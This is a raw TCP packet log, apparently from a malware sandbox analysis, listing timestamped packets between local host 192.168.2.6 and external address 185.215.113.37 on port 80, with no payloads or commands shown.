Oct 24, 2024 13:02:08.033982038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034001112 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034029007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034277916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034293890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034305096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034316063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034322977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034327030 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034351110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034378052 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034534931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034584045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034590006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034600973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034611940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034626961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034648895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034677029 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034713030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034813881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034885883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034885883 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034898043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034929037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034940958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.034965038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.034976959 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.035008907 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.035876989 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.035902023 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.035912037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.035928011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.035944939 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.036005974 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.036015987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.036026955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.036041975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.036060095 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.036093950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.036103964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.036128998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.036129951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.036155939 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.036174059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.071147919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.071181059 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.071192026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.071216106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.071259975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152044058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152144909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152158022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152187109 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152204037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152215004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152225018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152230978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152247906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152301073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152368069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152378082 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152388096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152411938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152430058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152493954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152504921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152514935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152529955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152539968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152568102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152764082 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152807951 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152831078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152841091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152874947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152911901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152921915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152931929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152942896 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.152955055 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.152973890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.153227091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153237104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153247118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153256893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153275013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.153292894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.153374910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153386116 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153394938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153405905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153415918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153417110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.153426886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153438091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.153439045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.153466940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.153492928 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.154279947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.154293060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.154303074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.154313087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.154325008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.154329062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.154362917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.155029058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155069113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155080080 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155085087 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.155112982 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.155194998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155205965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155210972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155219078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155277014 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.155325890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.155325890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.189922094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.189954996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.189970970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.189985991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.190073967 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.190100908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.190131903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.190155983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271119118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271193027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271230936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271264076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271301031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271351099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271358013 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271413088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271415949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271450043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271473885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271483898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271502972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271517992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271532059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271569967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271595001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271601915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271620035 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271651983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271656036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271689892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271703959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271723986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271740913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271756887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271789074 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271810055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271812916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271857977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271904945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271939993 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271962881 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.271977901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.271990061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272027016 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272032022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272068024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272083998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272105932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272116899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272152901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272176027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272224903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272228956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272264004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272286892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272310972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272346973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272378922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272396088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272412062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272423983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272448063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272454023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272495985 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272497892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272527933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272540092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272573948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272746086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272794008 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272799015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272834063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272846937 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272866964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.272880077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.272912025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273003101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273031950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273057938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273078918 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273554087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273611069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273660898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273691893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273716927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273730993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273742914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273776054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273785114 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273808956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.273818970 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273854017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.273967028 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.274019957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.274020910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.274049997 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.274080038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.274081945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.274102926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.274125099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.309072971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.309128046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.309186935 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.309186935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.309222937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.309231043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.309254885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.309257030 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.309277058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.309293985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.309302092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.309350014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.309389114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.309447050 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390047073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390100002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390127897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390136957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390153885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390171051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390192032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390218973 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390233040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390279055 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390285969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390322924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390341997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390356064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390373945 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390392065 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390412092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390424967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390445948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390480995 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390480995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390532017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390533924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390567064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390588045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390599966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390620947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390633106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390655041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390674114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390686989 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390711069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390728951 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390746117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390762091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390780926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390799046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390832901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390904903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390938997 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390959978 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.390974045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.390991926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391007900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391026020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391057968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391060114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391093969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391113997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391129017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391149044 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391163111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391182899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391197920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391217947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391252041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391413927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391467094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391473055 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391501904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391521931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391551971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391597033 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391630888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391654015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391663074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391676903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391699076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391715050 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391735077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391752958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391783953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391858101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391911983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.391925097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391957998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.391978979 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.392009974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393475056 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393527985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393537045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393563032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393583059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393596888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393618107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393630981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393651962 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393665075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393680096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393717051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393718958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393752098 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393773079 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393785954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.393800974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.393837929 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.428216934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.428322077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.428359985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:08.428364038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:08.428389072 CEST	49711	80	192.168.2.6	185.215.113.37
